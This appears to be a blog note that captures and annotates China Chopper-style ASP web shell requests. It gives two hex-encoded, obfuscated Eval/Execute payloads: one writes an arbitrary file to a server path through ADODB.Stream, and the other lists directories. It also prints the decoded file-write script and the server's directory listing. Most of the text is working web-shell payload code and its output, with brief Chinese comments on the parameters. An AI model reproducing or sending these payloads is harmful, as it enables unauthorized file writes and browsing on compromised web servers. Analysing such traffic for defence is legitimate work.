http://blog.csdn.net/webxscan 神龙
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute
%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci
%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd
(""""44696D206C2C73732C66662C543A66663D6264287265717565737428227A312229293A73733D5265717565737428227A3222293A6C3D4C656E287373293A53657420533D5365727665722E4372656174654F626A656374282241646F
64622E53747265616D22293A5769746820533A2E547970653D313A2E4D6F64653D333A2E4F70656E3A4966205265717565737428227A3322293E30205468656E3A2E4C6F616446726F6D46696C652022222666662622223A2E506F7369746
96F6E3D2E53697A653A456E642049663A7365742072733D4372656174654F626A656374282241444F44422E5265636F726473657422293A72732E6669656C64732E617070656E6420226262222C3230352C6C2F323A72732E6F70656E3A72
732E6164646E65773A72732822626222293D73732B636872622830293A72732E7570646174653A2E57726974652072732822626222292E6765746368756E6B286C2F32293A72732E636C6F73653A5365742072733D4E6F7468696E673A2E5
06F736974696F6E3D303A2E53617665546F46696C652022222666662622222C323A2E436C6F73653A456E6420576974683A53657420533D4E6F7468696E673A496620457272205468656E3A543D4572722E4465736372697074696F6E3A45
72722E436C6561723A456C73653A543D2231223A456E642049663A526573706F6E73652E5772697465285429"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C3132332E747874&z2=313233343536&z3=0
Dim l,ss,ff,T
ff=bd(request("z1"))
'z1 上传路径 C:\\Documents and Settings\\a\\×ÀÃæ\\www\\.\\123.txt
ss=Request("z2")
'z2 文件内容 123456
l=Len(ss)
Set S=Server.CreateObject("Adodb.Stream")
With S
.Type=1
.Mode=3
.Open
If Request("z3")>0 Then
'z3 下面这2行啥意思啊
.LoadFromFile ""&ff&""
.Position=.Size
End If
set rs=CreateObject("ADODB.Recordset")
rs.fields.append "bb",205,l/2
rs.open:rs.addnew:rs("bb")=ss+chrb(0)
rs.update:.Write rs("bb").getchunk(l/2)
rs.close
Set rs=Nothing
.Position=0
.SaveToFile ""&ff&"",2
.Close
End With
Set S=Nothing
If Err Then
T=Err.Description
Err.Clear
Else
T="1"
End If
Response.Write(T)
->|1|<-
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute
%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci
%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd
(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644
262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D6
1744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53
455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6
E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E57726974
6520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E61747472696
27574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696564292663
6872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")
&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C
->|1121111111/ 2016-05-06 22:17:08 0 16
bj1/ 2016-05-06 22:17:09 0 16
css/ 2016-05-06 22:17:09 0 16
img/ 2016-05-06 22:17:09 0 16
ip2/ 2016-05-06
22:17:09 0 16
js/ 2016-05-06 22:17:09 0 16
ThinkPHP/ 2016-05-06 22:17:16 0 16
zz/ 2016-05-06 22:17:22 0 16
zz - 副本/ 2016-05-06 22:17:24
0 16
新建文件夹/ 2016-05-06 22:17:25 0 16
.project 2016-04-05 06:48:00 1143 32
123.txt 2016-05-08 05:47:21 6 32
asp.asp 2016-04-30 01:08:10
2613 32
Aws.exe 2013-03-22 08:50:42 654164 32
cs.php 2016-04-21 21:02:34 375 32
eval.asp 2016-05-06 22:13:14 28 32
eval.php 2016-04-06 12:13:02
34 32
index.html 2016-04-05 06:48:00 123 32
web.sql 2016-04-10 22:38:32 25050 32
www.rar 2014-07-16 23:38:40 17318435 32
zz.rar 2014-07-16
22:49:38 3573855 32
|<-